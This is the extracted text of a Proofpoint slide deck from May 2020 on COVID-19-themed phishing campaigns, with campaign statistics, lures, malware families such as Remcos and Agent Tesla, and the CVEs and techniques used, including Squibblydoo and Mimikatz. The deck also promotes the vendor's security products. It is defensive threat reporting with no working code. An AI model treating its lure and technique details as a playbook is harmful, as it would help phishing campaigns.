Phishing During a Pandemic: Actors, Campaigns & Threats Leveraging COVID-19 Lures 27 May 2020
Phishing During a Pandemic: Actors, Campaigns & Threats Leveraging COVID-19 Lures27 May 2020
© 2019 Proofpoint. All rights reserved
Global Campaigns By Campaign Family
Global COVID-Themed Campaigns By Campaign Family
3© 2019 Proofpoint. All rights reserved
All Global Campaign Brand Abuse All COVID-Themed Global Campaign Brand Abuse
Global vs COVID Brand Abuse Trends
© 2019 Proofpoint. All rights reserved 4
5© 2019 Proofpoint. All rights reserved
Silent Librarian
Modest
Veers
Covid-19 Map
Covid-19 Fake Bill
Covid WHO Lure
LURES ACTORS
6© 2019 Proofpoint. All rights reserved
7© 2019 Proofpoint. All rights reserved
• High risk home network• Traditional VPN could allow
lateral movement
• Going straight to cloud apps from home office
• Traditional visibility limited• Possibly personal device with
uncertain security posture
• Targeted by phishing and BEC (likely leveraging COVID-19 lures)
• Low level of awareness for secure remote working
• No longer on corporate network
• Higher risk for downloaders pulling down secondary payloads
Key Changes to Secure Posture for Remote Work
8
Protecting transitions to remote workPeople-Centric Secure Remote Access
9
Insider Threat Management for increased visibility into what remote workers do with sensitive data
ZTNA for rapid, zero trust implementation of secure remote access to on prem systems and data without any hardware
Email protection for protection from threats, awareness training for secure remote work practices
Isolation to provide secure web browsing and BYOD access to SaaS applications
CASB for visibility, RBA, threat protection, and DLP across cloud apps
10
Covid-19 Threats
Relentless focus on credential phish
Legitimate filesharing abuse
More complex multi-stage threats
More BEC variants
Sophisticated attacks on Office 365 and G Suite accounts
11© 2020 Proofpoint. All rights reserved | Proofpoint, Inc. - Confidential and Proprietary
Covid-19 Threats
Relentless focus on credential phish
Legitimate filesharing abuse
More complex multi-stage threats
More BEC variants
Sophisticated attacks on Office 365 and G Suite accounts
office[.]com docs[.]google[.]com windows[.]net sharepoint[.]com
Domains with Most Threats Detected
12
Covid-19 Threats
Relentless focus on credential phish
Legitimate filesharing abuse
More complex multi-stage threats
More BEC variants
Sophisticated attacks on Office 365 and G Suite accounts
CVE-2017-8570 + OLE
SquibblyDoo(regsvr32.exe)
Lemon Tree (PoSH)
© 2020 Proofpoint. All rights reserved | Proofpoint, Inc. - Confidential and Proprietary
Covid-19 Threats
Relentless focus on credential phish
Legitimate filesharing abuse
More complex multi-stage threats
More BEC variants
Sophisticated attacks on Office 365 and G Suite accounts
Covid-19 Threats
Relentless focus on credential phish
Legitimate filesharing abuse
More complex multi-stage threats
More BEC variants
Sophisticated attacks on Office 365 and G Suite accounts
Malicious Third-Party Apps
COVID-19By the Numbers
© 2019 Proofpoint. All rights reserved
75 Million
COVID-19 Volume
© 2019 Proofpoint. All rights reserved 16
330+
Campaigns Tracked
malicious messages
(April 18-22)
Actors are motivated and integrating different themes spanning global to personal
Campaign themes
© 2019 Proofpoint. All rights reserved 17
Intrinsic
Mixed
Extrinsic
LocalRegional
Global
Tactical Operational Strategic
Widespread Mixed Focused
Prim
ary
Mot
ivat
ions
Delivery
Themes
Survival kits, Medical Supplies, cases near
me
Shipping, manufacturing
Retail, Banking
Tax reduction
Transnational… anti-bacteria credit card
Netherlands
Secondary Motivations
BEC
Markets, World Health
Organization
China, Italy, Netherlands,
Germany, United States,
Japan, Australia
Personal
Tactics Leveraging Coronavirus Malware Payloads
• Emotet• AZORult Stealer• AgentTesla Keylogger• GuLoader / NanoCore RAT• Microsoft Office Phish• HawkEye Keylogger• Betabot• Ave Maria / GuLoader / Remcos• Ave Maria / Remcos / LimeRAT• LimeRAT• Ostap / The Trick
Across the Threats
© 2019 Proofpoint. All rights reserved 18
MALICIOUS ATTACHMENT
MALICIOUS URL
CREDENTIAL PHISHING
BEC AND EMAIL FRAUD
FILE NAMES DOMAIN NAMES
Threat FocusExamples from the Landscape
© 2019 Proofpoint. All rights reserved
Threat Overview
• Summary: Campaign distributing RemcosRAT/downloader with 2 lures (one COVID-19, one harassment)
• Subject: Sexual harassment report / package notification
• Tactics and Tools: .iso image file• Malware: Remcos RAT• Volume: Widespread distribution
© 2020 Proofpoint. All rights reserved 20
Remcos RAT – COVID-19
Threat Overview
• Summary: Campaign spoofing US Department of Labor
• Lure: FMLA adjustments • Technique: IcedID (modular malware)• Volume: broadly targeted
© 2020 Proofpoint. All rights reserved 21
Family and Medical Leave Act
Threat Overview
• Summary: Message purporting to be from World Health with WHO seal
• Subject: “COVID-19 HIGH RISK VSL / URGENT”
• Tactics and Tools: Microsoft Office attachments that use exploits (Equation Editor, CVE-2017-11882, CVE-2017-8570, macros) to download Agent Tesla
• Volumes: 4000~ Messages– 372 Organizations– 44% Transportation– 15% Energy
Agent Tesla port vessel (1/2)
© 2019 Proofpoint. All rights reserved 22
Threat Overview
• Summary: Message purporting to be from World Health with WHO seal
• Subject: “COVID-19 HIGH RISK VSL / URGENT”
• Tactics and Tools: Microsoft Office attachments that use exploits (Equation Editor, CVE-2017-11882, CVE-2017-8570, macros) to download Agent Tesla
• Volumes: 4000~ Messages– 372 Organizations– 44% Transportation– 15% Energy
Agent Tesla port vessel (2/2)
© 2019 Proofpoint. All rights reserved 23
Threat Overview
• Summary: Campaign leveraging Word documents and Squibblydoo technique to launch Powershell script
• Subject: The Truth of COVID-19 ????????????
• Tactics and Tools: Word (RTF) documents used Squibblydoo to launch a PowerShell script. Followed by downloads of Mimikatz and remote desktop utility 'FreeRDP’
• Malware: Mimikatz via Powershell Script Then download of a remote desktop utility FreeRDP
• Targeting: 80 PFPT customers across 36 verticals.
The Truth of COVID-19 (1/1)
© 2019 Proofpoint. All rights reserved 24
• Spoofed offers of relief from financial institutions
• Primarily steals for credit card, direct deposit details, and other forms of financial data
• Most prevalent in the United States; also present in Europe, Australia, and Africa
Emerging Trends
25© 2020 Proofpoint. All rights reserved
Proofpoint and COVID-19Summary, our position, updates, questions
© 2019 Proofpoint. All rights reserved
© 2020 Proofpoint. All rights reserved | Proofpoint, Inc. - Confidential and Proprietary 27
PEOPLE-CENTRIC PROTECTION
DATA AND ACCESSCONTROLS
Advanced Email Security
Cloud Accounts
InternalEmail
Personal Webmail
Endpoint Activity
Web and UnsanctionedApp Access
Sanctioned Access
IdentityDeception
ProtectionTargeted Attack Protection (TAP)
Threat Response Auto-Pull (TRAP)
Internal MailDefense
Cloud Account Defense
EmailIsolation
Email DLP
Email Encryption
CASB DLP
BrowserIsolation
Zero Trust Access
Email FraudDefense
InsiderThreat Management
Cloud App Governance and Data Protection
Information Protection
AWARENESSAND TRAINING
Protect people from the threats that
target them
Enable users to protect themselves and your organization
Protect the data people create and access from
security and compliance risk
Response and Resources
• Detection for commodity remains strong
• TAP Campaigns being tracked as “COVID-19”
• Set of COVID-19 hunting and detection IDS sigs available open source in ET Open
– http://rules.emergingthreatspro.com/open/
• Free Meta VPN solution through September 2020
Continuing Updates
• Updates– Proofpoint blog updates
• https://www.proofpoint.com/us/blog
Response
© 2019 Proofpoint. All rights reserved 28
@threatinsight
Other Resources (All Free)
• Proofpoint Meta available to all Proofpoint customers at no charge for zero trust network access
• Security Awareness Training attack spotlight: Covid-19 lures
• Remote worker-tailored training modules
• Partner offer: MFA and SSO from Okta: https://www.okta.com/okta-for-emergency-remote-work/
29© 2019 Proofpoint. All rights reserved